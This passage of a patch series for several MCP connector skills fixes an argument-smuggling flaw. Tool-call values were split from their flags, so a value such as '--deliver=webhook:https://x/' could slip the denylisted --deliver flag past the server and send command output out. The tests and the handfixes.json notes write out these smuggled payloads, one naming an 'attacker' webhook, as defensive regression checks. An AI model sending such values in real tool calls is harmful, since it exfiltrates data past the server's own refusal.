+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/servosity/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/servosity/cli/internal/mcp/cobratree/shellout_test.go
@@ -993,15 +993,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/servosity/handfixes.json
+++ b/skills/servosity/handfixes.json
@@ -586,8 +586,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -597,7 +609,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/servosity/handfixes.json
+++ b/skills/servosity/handfixes.json
@@ -571,6 +571,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/sherweb/CHANGELOG.md
+++ b/skills/sherweb/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01

--- a/skills/sherweb/CHANGELOG.md
+++ b/skills/sherweb/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Added

--- a/skills/sherweb/CHANGELOG.md
+++ b/skills/sherweb/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/sherweb/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/sherweb/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/sherweb/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/sherweb/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/sherweb/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/sherweb/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/sherweb/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/sherweb/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/sherweb/handfixes.json
+++ b/skills/sherweb/handfixes.json
@@ -331,6 +331,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/sherweb/handfixes.json
+++ b/skills/sherweb/handfixes.json
@@ -346,8 +346,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -357,7 +369,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/skykick/CHANGELOG.md
+++ b/skills/skykick/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01

--- a/skills/skykick/CHANGELOG.md
+++ b/skills/skykick/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Added

--- a/skills/skykick/CHANGELOG.md
+++ b/skills/skykick/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/skykick/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/skykick/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/skykick/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/skykick/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/skykick/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/skykick/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/skykick/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/skykick/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
